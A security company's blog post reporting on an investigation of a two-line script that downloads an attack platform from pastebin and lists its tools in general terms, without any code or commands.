During a recent investigation of a very large infection we found a trove of attack tools that all pointed back to a single “meta” script. This script was only two lines long but provided an attacker with a powerful capability. Once it fully installs itself it provides what we are referring to as an “attack platform”.
We reverse engineered the script and revealed that it was downloading it’s full source code from pastebin.com which is a site where anyone can post any text anonymously. The attacker had posted the source on pastebin and the script would download itself from there and execute. The effect of this is that the initial infection is only two lines long.
The attack platform once fully installed provides an attacker with 43 attack tools they can then download, also from pastebin, with a single click. The functionality these tools provide includes:
Complete attack shells that let attackers manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMS’s, view and manage user accounts both on CMS’s and the local operating system and much more.
An FTP brute force attack tool
A Facebook brute force attacker
A WordPress brute force attack script
Tools to scan for config files or sensitive information
Tools to download the entire site or parts thereof
The ability to scan for other attackers shells
Tools targeting specific CMS’s that let you change their configuration to host your own malicious code
In the case of this infection, the source appears to be a hacking group in Vietnam and one individual within that group.
To provide you with some insight into the powerful capability that this platform provides, we have created a video demonstration where we infect a test virtual machine with the two line meta script and use it to download the tools it provides.
It’s important to note that we did this demonstration inside a clean new virtual machine and included a few tools of our own to prevent further infection and data exfiltration. These include forcing all network traffic from this machine via a proxy so that we can see what is arriving and leaving from this infected test machine.
This article was previously posted at wordfence.com